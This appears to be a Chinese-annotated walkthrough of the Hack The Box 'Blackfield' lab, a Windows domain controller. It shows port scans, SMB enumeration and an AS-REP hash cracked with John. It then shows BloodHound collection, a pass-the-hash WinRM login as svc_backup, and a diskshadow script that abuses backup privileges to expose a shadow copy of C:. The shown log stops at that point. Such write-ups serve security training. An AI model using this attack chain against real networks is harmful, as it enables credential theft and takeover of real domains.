┌──(mikannse㉿kali)-[~/HTB/blackfield] └─$ sudo nmap --min-rate=10000 -p- 10.10.10.192 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-19 22:57 CST Nmap scan report for 10.10.10.192 Host is up (0.079s latency). Not shown: 65525 filtered tcp ports (no-response) PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 593/tcp open http-rpc-epmap 3268/tcp open globalcatLDAP 5985/tcp open wsman 49677/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 21.11 seconds
┌──(mikannse㉿kali)-[~/HTB/blackfield] └─$ sudo nmap -sT -sC -sV -O -p53,88,135,139,389,445,593,3268,5985 10.10.10.192 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-19 22:59 CST Nmap scan report for 10.10.10.192 Host is up (0.074s latency).
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-19 21:48:44Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019 (88%) Aggressive OS guesses: Microsoft Windows Server 2019 (88%) No exact OS matches for host (test conditions non-ideal). Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 66.50 seconds
添加hosts:black.local
Enum
ldap枚举不了,因为没有权限
匿名枚举共享:
┌──(mikannse㉿kali)-[~/HTB/blackfield] └─$ smbmap -H 10.10.10.192 -u guest [+] IP: 10.10.10.192:445 Name: blackfield.local Status: Authenticated Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share forensic NO ACCESS Forensic / Audit share. IPC$ READ ONLY Remote IPC NETLOGON NO ACCESS Logon server share profiles$ READ ONLY SYSVOL NO ACCESS Logon server share
┌──(mikannse㉿kali)-[~/HTB/blackfield] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status #00^BlackKnight ($krb5asrep$23$support@BLACKFIELD.LOCAL) 1g 0:00:00:10 DONE (2024-09-19 23:55) 0.09842g/s 1410Kp/s 1410Kc/s 1410KC/s #1WHORE..#*bebe#* Use the "--show" option to display all of the cracked passwords reliably Session completed.
是support用户的密码,无法Winrm连接,再次SMB
┌──(mikannse㉿kali)-[~/HTB/blackfield] └─$ smbmap -H 10.10.10.192 -u support -p '#00^BlackKnight' <SNIP> [+] IP: 10.10.10.192:445 Name: blackfield.local Status: Authenticated Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share forensic NO ACCESS Forensic / Audit share. IPC$ READ ONLY Remote IPC NETLOGON READ ONLY Logon server share profiles$ READ ONLY SYSVOL READ ONLY Logon server share
┌──(mikannse㉿kali)-[~/HTB/blackfield/blood] └─$ bloodhound-python -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.10.10.192 -c DcOnly INFO: Found AD domain: blackfield.local INFO: Getting TGT for user WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.blackfield.local:88)] [Errno -2] Name or service not known INFO: Connecting to LDAP server: dc01.blackfield.local INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Connecting to LDAP server: dc01.blackfield.local INFO: Found 316 users INFO: Found 52 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 18 computers INFO: Found 0 trusts INFO: Done in 00M 18S
┌──(mikannse㉿kali)-[~/HTB/blackfield/auditshare] └─$ evil-winrm -i 10.10.10.192 -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d' Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami blackfield\svc_backup
User Name SID ===================== ============================================== blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413
GROUP INFORMATION -----------------
Group Name Type SID Attributes ========================================== ================ ============ ================================================== Everyone Well-knowngroup S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-knowngroup S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-knowngroup S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-knowngroup S-1-5-15 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-knowngroup S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION ----------------------
Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION -----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
┌──(mikannse㉿kali)-[~/HTB/blackfield] └─$ cat cmd set context persistent nowriters add volume c: alias temp create expose %temp% h: exit ┌──(mikannse㉿kali)-[~/HTB/blackfield] └─$ unix2dos cmd unix2dos: converting file cmd to DOS format..
需要转换一下换行符然后上传上去
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload cmd Info: Uploading /home/mikannse/HTB/blackfield/cmd to C:\Users\svc_backup\Documents\cmd Data: 120 bytes of 120 bytes copied Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_backup\Documents> mv cmd C:\Windows\Temp *Evil-WinRM* PS C:\Users\svc_backup\Documents> cd C:\Windows\Temp *Evil-WinRM* PS C:\Windows\Temp> diskshadow /s cmd Microsoft DiskShadow version 1.0 Copyright (C) 2013 Microsoft Corporation On computer: DC01, 9/20/20243:56:35 AM
-> set context persistent nowriters -> add volume c: alias temp -> create Alias temp for shadow ID {581f125e-ba6a-4553-a945-f2574bc04948} set as environment variable. Alias VSS_SHADOW_SET for shadow set ID {68e3a0ad-41ca-4044-bd06-0fbfefdc8c9f} set as environment variable.
Querying all shadow copies with the shadow copyset ID {68e3a0ad-41ca-4044-bd06-0fbfefdc8c9f}
* Shadow copy ID = {581f125e-ba6a-4553-a945-f2574bc04948} %temp% - Shadow copyset: {68e3a0ad-41ca-4044-bd06-0fbfefdc8c9f} %VSS_SHADOW_SET% - Original count of shadow copies = 1 - Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\] - Creation time: 9/20/20243:56:36 AM - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 - Originating machine: DC01.BLACKFIELD.local - Service machine: DC01.BLACKFIELD.local - Not exposed - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5} - Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1 -> expose %temp% h: -> %temp% = {581f125e-ba6a-4553-a945-f2574bc04948} The shadow copy was successfully exposed as h:\. -> exit
